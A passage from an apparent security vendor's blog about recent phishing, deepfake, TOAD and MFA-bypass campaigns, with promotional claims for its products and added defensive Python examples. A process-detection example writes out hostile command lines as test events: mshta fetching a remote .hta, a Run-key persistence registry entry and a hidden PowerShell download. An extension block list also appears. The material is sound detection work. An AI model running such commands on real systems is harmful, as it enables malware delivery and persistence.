An anti-phishing solution should also be considered for augmenting the protection provided through Microsoft Defender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block threats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection provided by EOP and Defender. It is also important to provide security awareness training to the workforce and ensure that spear phishing and RDP file attachments are included in the training. Also, consider conducting spear phishing simulations.

New Tactics Used by Threat Actors for Phishing, Malware Delivery, and Extortion

Several new campaigns have been detected in recent weeks that use diverse tactics to trick people into disclosing sensitive information and installing malware.

Cybercriminals Target Crypto Wallets via Webflow Sites

Webflow is a software-as-a-service company that businesses can use to accelerate website development. The platform makes it easier to create websites and web pages, simplifying and eliminating many of the complex tasks to speed up website creation. Cybercriminals have taken advantage of the platform and are using it to rapidly spin up phishing pages and create pages to redirect users to malicious sites. One of the main advantages of Webflow compared to alternative platforms is the ease of creating custom subdomains, which can help phishers make their phishing pages more realistic. Subdomains can be created to mimic the login pages that they are impersonating, increasing the probability that individuals will be fooled into disclosing their credentials.

The number of detected phishing pages on Webflow has increased sharply, especially for crypto scams. One of the campaigns impersonated the Trezor hardware wallet. Since the subdomain can be customized to make the phishing page appear official, and screenshots of the actual Trezor site are used, these phishing pages can be very convincing. In these campaigns, the aim is to steal the victim’s seed phrase so the threat actor can access the cryptocurrency wallet and transfer the funds. In one campaign, once the seed phrase is disclosed, the user is told their account has been suspended for unauthorized activity and is directed to launch a chat service for support. The chat service is manned by the threat actor, who keeps the victim engaged while their wallet is emptied.

Hackers Use Deepfakes to Target Finance Professionals

The cost of artificial intelligence (AI) solutions is falling and cybercriminals are taking advantage. AI is increasingly being used to manipulate images, audio, and video recordings to make their scams more convincing. These deepfakes are realistic and more effective at tricking individuals into making fraudulent wire transfers than business email compromise scams, as they include deepfake videos of the person being spoofed. Cybercriminals use AI tools to create deepfakes from legitimate video presentations and webinars, impersonating an executive such as the CEO or CFO in an attack on finance team members. The aim is to trick the employees into making a wire transfer. Earlier this year, the engineering group Arup was targeted using a deepfake of the company CFO, and $25 million was transferred to the scammers in transfers to five different bank accounts.

Vendors are often spoofed in deepfake scams to trick their clients into wiring payments to attacker-controlled bank accounts. A recent survey by Medius revealed that 53% of finance professionals in the UK and US had experienced at least one attempted deepfake scam. These scams may occur over the phone, with the deepfake occurring in real-time, and there have been many cases of deepfake impersonations over video conferencing platforms such as Microsoft Teams and Zoom.

North Korean Hackers Target Developers with Fake Job Interviews

The North Korean hacking team, Lazarus Group, is known to use diverse tactics in its attacks. The group has now been observed infiltrating business networks by obtaining positions as IT workers. According to Mandiant, dozens of Fortune 100 companies have been tricked into hiring workers from North Korea, who steal corporate data after being hired. One UK firm discovered it had been duped 4 months after employing an IT worker who was actually based in North Korea. The IT worker used the network access provided to siphon off sensitive data and, when sacked for poor performance, demanded a ransom to return the stolen data. Researchers believe the data was provided to North Korea.

The Lazarus Group has also been targeting developers through fake interviews. The group hosts fake coding assessments on legitimate repositories such as GitHub and hides malicious code in those repositories, especially in Python files. The developers are tricked into downloading the code and are tasked with finding and fixing a bug but will inadvertently execute the malicious code regardless of whether they complete the assessment. The hackers often pose as legitimate companies in the financial services.

Legitimate File-Hosting Services Used for Phishing Attacks and Malware Distribution

One of the ways that cybercriminals attempt to bypass filtering mechanisms is to use legitimate hosting services for phishing and malware delivery. Dropbox, OneDrive, Google Drive, and SharePoint are all commonly used by cybercriminals. These services are used by businesses for storing and sharing files and for collaboration, so these services are often trusted. They are also often trusted by security solutions. Tactics commonly used include sharing links to files hosted on these services via phishing emails, often restricting access to the files to prevent detection by security solutions. For instance, the user is required to be logged in to access the file. Files may be hosted in view-only mode to avoid detection by security solutions, with social engineering techniques used to fool the user into downloading the files.

Cybercriminals are constantly evolving their tactics to phish for credentials, distribute malware, and gain unauthorized access to sensitive data. Businesses need to adopt a defense-in-depth approach to security, adding several layers to their defenses to combat new threats. These measures include an advanced spam filtering service with machine learning capabilities and email sandboxing, a web filter for blocking access to malicious websites and preventing malware downloads from the Internet, anti-phishing solutions for Microsoft 365 environments to block the threats that Microsoft often fails to detect, and comprehensive security awareness training for the workforce.

Cybercriminals will continue to evolve their tactics, so security solutions should also be able to evolve and be capable of detecting zero-day threats. With TitanHQ as your security partner, you will be well protected against these rapidly changing tactics.  Give the TitanHQ team a call today to find out more about improving your technical and human defenses against these threats.

Threat Actors Increasingly Using Scripts in Emails for Malware Delivery

For many years, cybercriminals have favored Office documents for distributing malware. These documents are familiar to most workers and are likely to be opened because they are so familiar and used so often. The documents may contain hyperlinks to malicious websites where malware is downloaded, but the easiest method is automating the delivery of malware using a malicious macro. If that macro is allowed to run, the infection process will be triggered.

Microsoft has helped to make documents and spreadsheets more secure by disabling macros by default if they have been delivered via the Internet and increasing numbers of companies are providing workforce security awareness training and instructing their employees not to enable content on Office documents delivered via the Internet. It has become much harder for cybercriminals to distribute malware using these file formats, so they have turned to script languages for malware delivery.

The use of VBScript and JavaScript in malware distribution campaigns has been increasing, with these executable files often hidden from security solutions by adding them to archive files. The scripts used in campaigns are snippets of code that include command sequences, which automate the downloading and execution of malware, often only operating within the system’s memory to avoid detection. The user is likely to be unaware that malware installation has been triggered.

For example, in one campaign, a malicious VBS script was hidden in an archive file to evade email security defenses. If extracted and executed, the script ran PowerShell commands, which can be difficult for security solutions to identify as malicious. PowerShell triggered the BitsTransfer utility to fetch another PowerShell script, which downloaded and decoded shellcode, which in turn loaded a second shellcode that used the Windows wab.exe utility to download an encrypted payload. The shellcode decrypted and incorporated the payload into wab.exe, turning it into the remote access trojan, Remcos RAT. This multi-stage infection process used living-off-the-land techniques to evade security solutions, and it all started with an email that used social engineering to trick the recipient into executing the script.
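Both Remcos chains on this page, the Excel attachment that launches mshta.exe and then reg.exe (described under the Excel campaign above) and the VBS script that launches PowerShell, BitsTransfer and wab.exe (described in the paragraph just above), leave a recognizable parent-child process trail even though the payload itself never touches disk. As an added example that is not code from the page or from TitanHQ, the following detection logic walks constructed process-creation events (Sysmon-style fields) and flags those steps. Paths, file names and the URL in the events are placeholders, and the rule names are my own.

```python
"""Added example (not from the page or TitanHQ): flag the parent/child process chains of
the two Remcos campaigns from endpoint process-creation telemetry. The events are
constructed to mirror those chains; paths, file names and URLs are placeholders."""

# Constructed process-creation events (Sysmon-style fields: pid, ppid, image, command line).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    # Chain 1: Excel attachment -> mshta.exe -> reg.exe adding a Run-key entry for persistence
    {"pid": 200, "ppid": 100, "image": "excel.exe",
     "cmdline": r"EXCEL.EXE C:\Users\u\Downloads\PO-4471.xls"},
    {"pid": 201, "ppid": 200, "image": "mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/x.hta"},
    {"pid": 202, "ppid": 201, "image": "reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\u\AppData\x.exe"},
    # Chain 2: VBS from an archive -> PowerShell using BitsTransfer -> wab.exe
    {"pid": 300, "ppid": 100, "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\Downloads\invoice.vbs"},
    {"pid": 301, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell -w hidden Import-Module BitsTransfer; Start-BitsTransfer ..."},
    {"pid": 302, "ppid": 301, "image": "wab.exe", "cmdline": "wab.exe"},
    # Benign control: an administrator running PowerShell from the desktop
    {"pid": 400, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell Get-ChildItem"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
CHILDREN_SUSPICIOUS_UNDER_OFFICE = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def process_chain(events, pid):
    """Walk ppid links back to the root and return the image names, root first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against pid reuse loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def detect(events):
    """Return (pid, rule) for every event matching a rule; one event may match several."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"], {}).get("image", "").lower()
        cmd = e["cmdline"].lower()
        if parent in OFFICE_APPS and image in CHILDREN_SUSPICIOUS_UNDER_OFFICE:
            alerts.append((e["pid"], "office_app_spawned_script_host"))
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            alerts.append((e["pid"], "script_host_spawned_powershell"))
        if image == "powershell.exe" and "bitstransfer" in cmd:
            alerts.append((e["pid"], "powershell_bits_download"))
        if parent == "powershell.exe" and image == "wab.exe":
            alerts.append((e["pid"], "powershell_launched_wab"))
        if image == "reg.exe" and " add " in cmd and r"\currentversion\run" in cmd:
            alerts.append((e["pid"], "run_key_persistence"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"{rule:32s} pid={pid} chain={' > '.join(process_chain(EVENTS, pid))}")
```

The benign PowerShell launched from explorer.exe produces no alert, which is the property these rules need: they key on who started the process and what it was asked to do, not on PowerShell or reg.exe as such.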

Using this attack as an example, there are opportunities for identifying the email for what it really is. Businesses need to ensure they have advanced email security defenses in place such as an advanced spam filter for Office 365 or a machine-learning/AI-driven spam filtering service. These services perform standard checks of inbound email, such as anti-spoofing and reputation checks on the sender, Bayesian analysis to determine whether the email is likely to be spam, but also machine learning checks, where the inbound message is compared against the emails typically received by a business and is flagged if any irregularities are found.
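The Bayesian check mentioned above is worth seeing in miniature, because it explains both why it works and why it is only one layer. Below is an added example, not code from the page or from SpamTitan: a multinomial naive Bayes classifier with Laplace smoothing, trained on a small constructed corpus of six messages, which returns a spam probability and the tokens that contributed most to it. The messages, labels and class names are made up for illustration.

```python
"""Added example (not the page's or SpamTitan's code): a multinomial naive Bayes filter,
the 'Bayesian analysis' step of a spam filter, trained on a constructed corpus."""
import math
import re
from collections import Counter

# Constructed training corpus: tiny, but enough to show how per-token evidence adds up.
TRAINING = [
    ("spam", "Act now: verify your account password"),
    ("spam", "URGENT account suspended, click link now"),
    ("spam", "Claim your prize, click now"),
    ("ham", "Meeting notes attached for tomorrow"),
    ("ham", "Please review the quarterly report"),
    ("ham", "Lunch tomorrow at noon"),
]

TOKEN = re.compile(r"[a-z0-9']+")


def tokenize(text):
    return TOKEN.findall(text.lower())


class NaiveBayesSpamFilter:
    def __init__(self, alpha=1.0):
        self.alpha = alpha  # Laplace smoothing: an unseen word never zeroes out a class
        self.words = {"spam": Counter(), "ham": Counter()}
        self.docs = Counter()
        self.vocab = set()

    def train(self, labeled):
        for label, text in labeled:
            toks = tokenize(text)
            self.words[label].update(toks)
            self.docs[label] += 1
            self.vocab.update(toks)

    def log_likelihood(self, token, label):
        """log P(token | label) with add-alpha smoothing over the whole vocabulary."""
        total = sum(self.words[label].values())
        return math.log((self.words[label][token] + self.alpha)
                        / (total + self.alpha * len(self.vocab)))

    def spam_probability(self, text):
        """Posterior P(spam | text), computed in log space and normalized."""
        toks = tokenize(text)
        n = sum(self.docs.values())
        logp = {
            label: math.log(self.docs[label] / n) + sum(self.log_likelihood(t, label) for t in toks)
            for label in ("spam", "ham")
        }
        m = max(logp.values())
        return math.exp(logp["spam"] - m) / sum(math.exp(v - m) for v in logp.values())

    def evidence(self, text, top=3):
        """Tokens ranked by how strongly they pull toward spam (positive) or ham (negative)."""
        ratios = {t: self.log_likelihood(t, "spam") - self.log_likelihood(t, "ham")
                  for t in set(tokenize(text))}
        return sorted(ratios.items(), key=lambda kv: -abs(kv[1]))[:top]

    def classify(self, text, threshold=0.5):
        return "spam" if self.spam_probability(text) >= threshold else "ham"


def build_filter():
    f = NaiveBayesSpamFilter()
    f.train(TRAINING)
    return f


if __name__ == "__main__":
    f = build_filter()
    for msg in ("urgent verify your password now", "quarterly report meeting tomorrow"):
        print(f"{f.spam_probability(msg):.3f} {f.classify(msg):4s} {msg!r} {f.evidence(msg)}")
```

Two things the toy makes visible: the verdict is driven by a handful of high-ratio tokens, and a sender who avoids those tokens (or hides the lure in an attachment, as the VBS campaign above does) gets a low score. That is why the page pairs this check with sender reputation, anomaly detection and sandboxing rather than relying on it alone.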

Anti-virus scans are useful for detecting malware, but these checks can often be evaded by adding malicious scripts to archive files, and the multi-stage process involved in infection is often sufficient to defeat signature-based malware detection. An email security solution therefore needs to also use email sandboxing. All attachments capable of being used for malicious purposes are scanned with an anti-virus engine and are then sent to the sandbox for deep analysis. Malware sandboxing for email is important, as it detects malware not by its signature, but by its behavior, which is vital for identifying script-based malware delivery. While there are sandboxing message delays, it prevents many costly malware infections.

SpamTitan, TitanHQ’s cloud-based anti-spam service, incorporates these checks to provide exceptional malware detection. In recent independent tests, SpamTitan blocked 100% of malware and had a 99.99% phishing catch rate and a 0.000% false positive rate. In addition to using an advanced spam filter, businesses can further reduce risk by blocking delivery of the 50 or so archive file formats supported by Windows if they are not used by the business.
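The archive advice above is easy to state and easy to get wrong at the edges: a blocked script extension is trivial to catch on its own, but the same file inside a zip, a double extension like invoice.pdf.vbs, a nested archive, or an encrypted member that no scanner can open all need handling too. As an added example that is not code from the page or from SpamTitan, the following attachment policy blocks executables, scripts and RDP files outright, blocks archive formats the business does not use (the assumption here is that only .zip is exchanged), and inspects permitted zips member by member. The sample archive is constructed in memory, and the extension lists are my own assumptions for illustration.

```python
"""Added example (not the page's or SpamTitan's code): an attachment policy that blocks
script/executable attachments, blocks unused archive formats, and looks inside the one
permitted archive format for hidden scripts. Lists are assumptions; the zip is constructed."""
import io
import zipfile

# Extensions to block outright: executables, scripts, and RDP connection files.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".dll", ".com", ".rdp", ".vbs", ".vbe", ".js", ".jse",
                      ".hta", ".ps1", ".bat", ".cmd", ".lnk", ".iso", ".img"}
# Assumption: the business exchanges .zip only, so other archive formats are not delivered.
ALLOWED_ARCHIVES = {".zip"}
OTHER_ARCHIVES = {".rar", ".7z", ".ace", ".arj", ".cab", ".tar", ".gz", ".bz2", ".xz", ".z"}


def extension_of(name):
    """Last extension only, lower-cased: 'invoice.pdf.vbs' -> '.vbs'."""
    base = name.rsplit("/", 1)[-1]
    return "." + base.rsplit(".", 1)[1].lower() if "." in base else ""


def inspect_zip(data):
    """Reasons to block a .zip: script/executable members, nested archives, encrypted or malformed."""
    reasons = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                    reasons.append(f"encrypted member cannot be scanned: {info.filename}")
                    continue
                ext = extension_of(info.filename)
                if ext in BLOCKED_EXTENSIONS:
                    reasons.append(f"blocked file type inside archive: {info.filename}")
                elif ext in ALLOWED_ARCHIVES or ext in OTHER_ARCHIVES:
                    reasons.append(f"nested archive: {info.filename}")
    except zipfile.BadZipFile:
        reasons.append("malformed archive cannot be inspected")
    return reasons


def triage_attachment(filename, data):
    """Decide 'block' or 'deliver' for one attachment and record why."""
    ext = extension_of(filename)
    if ext in BLOCKED_EXTENSIONS:
        reasons = [f"blocked file type: {filename}"]
    elif ext in OTHER_ARCHIVES:
        reasons = [f"archive format not used by the business: {filename}"]
    elif ext in ALLOWED_ARCHIVES:
        reasons = inspect_zip(data)
    else:
        reasons = []
    return {"action": "block" if reasons else "deliver", "reasons": reasons}


def build_sample_zip():
    """Constructed archive: a harmless text file next to a script with a double extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed harmless text")
        zf.writestr("invoice.pdf.vbs", "' constructed placeholder, not a script\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, payload in (("docs.zip", build_sample_zip()), ("report.pdf", b"%PDF-1.4"),
                          ("files.rar", b"Rar!"), ("broken.zip", b"not a zip")):
        print(name, triage_attachment(name, payload))
```

The policy fails closed: anything it cannot look inside, whether an encrypted member or a malformed container, is treated as a reason to block, because "could not scan" is exactly the outcome the archive trick is designed to produce.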

It is also important to provide continuous security awareness training to the workforce to improve awareness of threats and the new tactics, techniques, and procedures being used by threat actors to trick individuals into providing them with network access. This is easily done with TitanHQ’s SafeTitan security awareness training platform, especially when combined with phishing simulations.

Cyberattacks targeting individuals are increasing in sophistication and standard security defenses are often evaded. To find out more about improving your defenses against sophisticated phishing, malware, and business email compromise threats, give the TitanHQ team a call. Improving your defenses is likely to be much cheaper than you think.

Multiple Accounts Compromised in Targeted Phishing Campaigns

The purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an employee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s account and any data contained therein. That access can be all that is required for the threat actor to achieve a much more extensive compromise.

Oftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same organization. These phishing attacks can be harder to spot as they have been tailored to that specific organization. These attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email account. The emails may address each individual by name, or appear to be broadcast messages to staff members. One successful campaign was identified by the Office of Information Technology at Boise State University, although not before several employees responded to the emails and disclosed their credentials. In this campaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account by “Health Services,” purporting to be an update on workplace safety. The emails had the subject line “Workplace Safety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection had been reported to the health department.

In the message, recipients were advised about a health matter involving a member of staff and told to contact the Health Services department if they believed they had had any contact with the unnamed worker. To find out whether they had had contact with the worker, a link had to be clicked. The link directed the user to a fraudulent login page on an external website, where they were required to enter their credentials. The login page had been created to look like a legitimate Boise State University page; it captured the credentials and used a Duo Security notification to authorize access to the account.

These targeted campaigns are now common, especially at large organizations where it is possible to compromise a significant number of accounts and is worth the attacker’s time to develop a targeted campaign. Another attack was recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the HR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were tricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their personal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit information to have the employees’ wages paid into the attacker’s account. Several employees were fooled by the scam; although in this case the attack was detected promptly and the SSTA system was disabled to prevent fraudulent transfers.

A different type of campaign recently targeted multiple employees via email, although the aim of the attack was to grant the threat actor access to the user’s device by convincing them to install the legitimate remote access solution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses and bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was to create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group has also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help desk and offered assistance resolving the spam problem it had created, which involved the employee downloading AnyDesk and granting access to their device. During the session, tools were installed to provide persistent access. The threat actor then moved laterally within the network and extensively deployed ransomware.

These attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags should have been spotted revealing these social engineering attempts for what they are but more than one employee failed to spot them. It is important to provide security awareness training to the workforce to raise awareness of phishing and social engineering threats, and for training to be provided regularly. Training should include the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support calls, malicious websites, smishing, and vishing attacks.

A phishing simulator should be used to send realistic but fake phishing emails internally to identify employees who fail to spot the red flags. They can then receive additional training relative to the simulation they failed. By providing regular security awareness training and conducting phishing simulations, employers can develop a security culture. While it may not be possible to prevent all employees from responding to a threat, the severity of any compromise can be limited. With TitanHQ’s SafeTitan solution, it is easy to create and automate tailored training courses and phishing simulations that have been shown to be highly effective at reducing susceptibility to phishing and other threats.

Since threat actors most commonly target employees via email, it is important to have robust email defenses to prevent the threats from reaching employees. Advanced anti-spam services such as SpamTitan incorporate a wide range of threat detection methods to block more threats, including reputation checks, extensive message analysis, machine-learning-based detection, antivirus scans, and email sandboxing for malware detection. SpamTitan has been shown to block more than 99.99% of phishing threats and 100% of malware.

TOAD Attacks: New Voice-Based Phishing Techniques Used in Attacks on Businesses

Phishing is one of the most effective methods used by cyber actors to gain initial access to protected networks. Phishing tactics are evolving, and TOAD attacks now pose a significant threat to businesses. TOAD stands for Telephone-Oriented Attack Delivery and is a relatively new and dangerous form of phishing that involves a telephone call, although there are often several different elements to a TOAD attack, which may include initial contact via email, SMS messages, or instant messaging services.

TOAD attacks often start with an information-gathering phase, where the attacker obtains personal information about individuals that can then be targeted. That information may only be a mobile phone number or an email address, although further information is required to conduct some types of TOAD attacks.

One of the most common types of TOAD attacks is callback phishing. The attacker impersonates a trusted entity in an email and makes a seemingly legitimate request to make contact. There is a sense of urgency to get the targeted individual to take prompt action. Rather than use a hyperlink in the message to direct the user to a website, the next phase of the attack takes place over the telephone or a VOIP-based service such as WhatsApp. A phone number is included that must be called to resolve a problem.

If the call is made, the threat actor answers, builds trust with the victim during the call, and then makes their request. That could be an instruction to visit a website where sensitive information must be entered or a file must be downloaded. That file download leads to a malware infection.

Several TOAD attacks have involved the installation of legitimate remote access software. One campaign involved initial contact via email about an expensive subscription that was about to be renewed, which required a call to cancel. The threat actor convinced the user to download remote access software, which the user was told was necessary to prevent the charge from being applied, for example to fully remove the subscription software from the user’s device.

The user is convinced to give the threat actor access to their device through the software, and the threat actor keeps the person on the line while they install malware or perform other malicious actions, reassuring them if they get suspicious. Other scams involve initial contact about a fictitious purchase that has been made, or a bank scam, where an email impersonates a bank and warns the victim that an account has been opened in their name or a large charge is pending. These attacks result in the victim providing the threat actor with the information they need to access their account.

TOAD attacks often involve the impersonation of a trusted individual, who may be a colleague, client, or even a family member. Since information is gathered before the scam begins, when the call is made, the threat actor can provide that information to the victim to convince them that they are who they claim to be. That information may have been purchased on the dark web or obtained in a previous data breach. For instance, following a healthcare data breach, the healthcare provider may be impersonated, and the attacker can provide medical information in their possession to convince the victim that they work at the hospital.

The use of AI tools makes these scams even more convincing. Deepfakes are used, where a person’s voice is mimicked, or video images are manipulated on video conferencing platforms. Deepfakes were used in a scam on an executive in Hong Kong, who was convinced to transfer around £20 million in company funds to the attacker’s account, believing they were communicating with a trusted individual via a video conferencing platform.

TOAD attacks may be solely conducted over the phone, where the attacker uses call spoofing to manipulate the caller ID to make it appear that the call is coming from a known and previously verified number. Other methods may be used to convince the victim that the reason for the call is genuine, such as conducting a denial-of-service attack to disrupt a service or device to convince the user that there is an urgent IT problem that needs to be resolved. TOAD attacks are increasing because standard phishing attacks on businesses are becoming harder to pull off due to email security solutions, multifactor authentication, and improved user awareness about scam messages.

Unfortunately, there is no single cybersecurity solution or method that can combat these threats. A comprehensive strategy is required that combines technical measures, security awareness training and administrative controls. Advanced anti-spam software with machine learning and AI-based detection can identify the emails that are used for initial contact. These advanced detection capabilities are needed because the initial emails often contain no malicious content, other than a phone number. SpamTitan, TitanHQ’s cloud-based anti-spam service, can detect these initial emails through reputation checks on the sender’s IP address, email account, and domain, and machine learning is used to analyze the message content, including comparing emails against the typical messages received by a business.

WebTitan is a cloud-based DNS filter that is used to control the web content that users can access. WebTitan will block access to known malicious sites and can be configured to prevent certain file types from being downloaded from the internet, such as those commonly used to install malware, unauthorized apps, and remote access solutions.

Regular security awareness training is a must. All members of the workforce should be provided with regular security awareness training, and TOAD attacks should feature in the training content. SafeTitan, TitanHQ’s security awareness training platform and phishing simulator, makes it easy for businesses to create and automate training courses for the workforce. Employees should be trained to identify a TOAD attack, not to trust caller ID alone, to avoid clicking links in emails and SMS messages, to be vigilant when receiving or making calls, to report any suspicious activity, and to end a call immediately if something does not seem right.

Mamba 2FA Phishing Kit Used to Bypass MFA on Microsoft 365 Accounts

Researchers have identified a new phishing kit that is being used to steal credentials for Microsoft 365 accounts and gain access to accounts protected by multi-factor authentication (MFA). The phishing kit, called Mamba 2FA, is a cause for concern as it has the potential to be widely adopted given its relatively low price, and there are signs that it is proving popular with cybercriminals since its release in late 2023. Phishing kits make it easy for low-skilled cybercriminals to conduct sophisticated attacks as they provide all the tools required to breach accounts. The Mamba 2FA kit includes the necessary infrastructure to conduct phishing campaigns, masks IP addresses to prevent them from being blocked, and updates the phishing URLs frequently to ensure they remain active and are not blocked by security solutions.

The Mamba 2FA kit includes phishing pages that mimic Microsoft services such as OneDrive and SharePoint, and the pages can be customized to create realistic phishing URLs for targeting businesses, including allowing the business logo and background images to be added to the login page. Since businesses often have MFA enabled, simply stealing Microsoft credentials is not sufficient, as the MFA will block any attempt to use the credentials for unauthorized access. Like several other popular phishing kits, the Mamba 2FA kit supports adversary-in-the-middle (AitM) attacks, incorporating proxy relays to steal one-time passcodes and authentication cookies in real time. When credentials are entered into the phishing page, they are relayed to Microsoft’s servers in real-time and Microsoft’s responses are relayed back to the victim, including MFA prompts, which allows the threat actor to steal the session cookie and gain access to the user’s account.

Phishing kits such as Mamba 2FA pose a serious threat to businesses, which should take steps to protect against attacks. The AitM tactics can defeat less secure forms of MFA that are based on one-time passwords but are not effective against hardware-based MFA. Implementing phishing-resistant MFA will ensure these attacks do not succeed. Other recommended controls include geo-blocking and allowlisting for IPs and devices. While these advanced phishing kits are effective, threat actors must convince people to click a link in an email and disclose their login credentials, and with advanced email security solutions these phishing threats can be identified and blocked before they reach inboxes. Training should also be provided to the workforce to help with the identification and avoidance of phishing.
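
The reason hardware-backed, phishing-resistant MFA defeats the relay described above is that a WebAuthn assertion carries the origin the browser actually loaded the sign-in page from, and the server rejects any origin other than its own. The following Python example is added here to show those server-side checks; it is not code from TitanHQ or from any authenticator vendor. All domains, the relying-party ID and the assertion format are constructed for the example, and the public-key signature verification that a real server performs is left out.

```python
import base64
import hashlib
import json
import os

# All names here are constructed for this example; no real relying party is involved.
EXPECTED_ORIGIN = "https://login.example.com"   # origin users are supposed to sign in on
EXPECTED_RP_ID = "example.com"                  # relying-party ID the credential was registered for


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_assertion(origin: str, rp_id: str, challenge: bytes) -> dict:
    """Constructed stand-in for what the browser/authenticator emit for navigator.credentials.get().

    The browser, not the web page, fills in `origin`, so a page served from a relay domain
    cannot claim to be EXPECTED_ORIGIN. authenticatorData begins with SHA-256(rpId).
    """
    client_data = json.dumps({
        "type": "webauthn.get",
        "challenge": b64url_encode(challenge),
        "origin": origin,
    }).encode()
    flags = b"\x05"  # UP (user present) | UV (user verified)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + flags + (1).to_bytes(4, "big")
    return {"clientDataJSON": b64url_encode(client_data),
            "authenticatorData": b64url_encode(auth_data)}


def verify_assertion(assertion: dict, expected_challenge: bytes,
                     expected_origin: str = EXPECTED_ORIGIN,
                     expected_rp_id: str = EXPECTED_RP_ID) -> str:
    """Server-side checks from the WebAuthn assertion ceremony (signature check omitted)."""
    client_data = json.loads(b64url_decode(assertion["clientDataJSON"]))
    if client_data.get("type") != "webauthn.get":
        return "rejected: wrong ceremony type"
    if b64url_decode(client_data.get("challenge", "")) != expected_challenge:
        return "rejected: challenge mismatch (replay or cross-session use)"
    if client_data.get("origin") != expected_origin:
        return "rejected: origin mismatch (sign-in did not happen on the real site)"
    auth_data = b64url_decode(assertion["authenticatorData"])
    if len(auth_data) < 37:
        return "rejected: malformed authenticatorData"
    if auth_data[:32] != hashlib.sha256(expected_rp_id.encode()).digest():
        return "rejected: rpIdHash mismatch"
    if not auth_data[32] & 0x01:
        return "rejected: user presence flag not set"
    # A real verifier now checks the signature over authenticatorData || SHA-256(clientDataJSON)
    # with the credential's public key; that signature is what stops a relay from editing `origin`.
    return "ok"


def demo() -> dict:
    challenge = os.urandom(32)
    genuine = make_assertion(EXPECTED_ORIGIN, EXPECTED_RP_ID, challenge)
    # Same user and key, but the sign-in page was loaded from a relay domain. In a real browser
    # the request would already fail client-side (rpId must be a suffix of the page's domain);
    # the server-side origin check is the defence-in-depth layer shown here.
    relayed = make_assertion("https://login.example.com.relay.example", EXPECTED_RP_ID, challenge)
    return {
        "genuine": verify_assertion(genuine, challenge),
        "relayed": verify_assertion(relayed, challenge),
        "replayed": verify_assertion(genuine, os.urandom(32)),
    }


if __name__ == "__main__":
    print(demo())
```

Contrast this with a one-time passcode: the code is just six digits, says nothing about where it was typed, and so relays unchanged through a proxy. The assertion above fails on the origin check before anything else is considered.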

TitanHQ can help through the SpamTitan cloud-based spam filtering service and the SafeTitan security awareness training and phishing simulation platform. SpamTitan incorporates reputation checks, Bayesian analysis, greylisting, machine learning-based detection, antivirus scans, and email sandboxing to block phishing and malware threats. Independent tests demonstrated SpamTitan was one of the best spam filtering solutions for businesses at blocking threats, with a 99.99% phishing block rate and a 100% malware block rate.

The SafeTitan security awareness training platform makes it easy for businesses to provide regular cybersecurity awareness training. The platform includes more than 80 training modules, videos, and webinars, with hundreds of phishing simulation templates based on real-world phishing examples. Regular training and phishing simulations have been proven to be highly effective at reducing susceptibility to phishing and other threats targeting employees. This month, TitanHQ has also launched its security awareness training platform for MSPs, which has been specifically developed to make it quick and easy for MSPs to incorporate security awareness training into their service stacks. Speak with TitanHQ today for more information about these and other cybersecurity solutions for combatting the full range of cyber threats.

New Phishing and Malware Delivery Tactics Observed in September

New SEO poisoning, phishing, and deepfake techniques have been identified in campaigns for malware delivery, credential theft, and financial fraud this month. It is important to ensure you have appropriate defenses in place and you update your training programs to raise awareness of these new tactics.

SEO Poisoning Used to Deliver Wikiloader Malware Masquerading as the GlobalProtect VPN

Early in September, Palo Alto Networks reported that its virtual private network, GlobalProtect, was being spoofed in a campaign to deliver Wikiloader (WailingCrab) malware – a malware variant used for delivering other malware payloads onto infected devices. The threat actors behind Wikiloader campaigns sell access to other cybercriminals, so an infection with Wikiloader could lead to all manner of other infections.

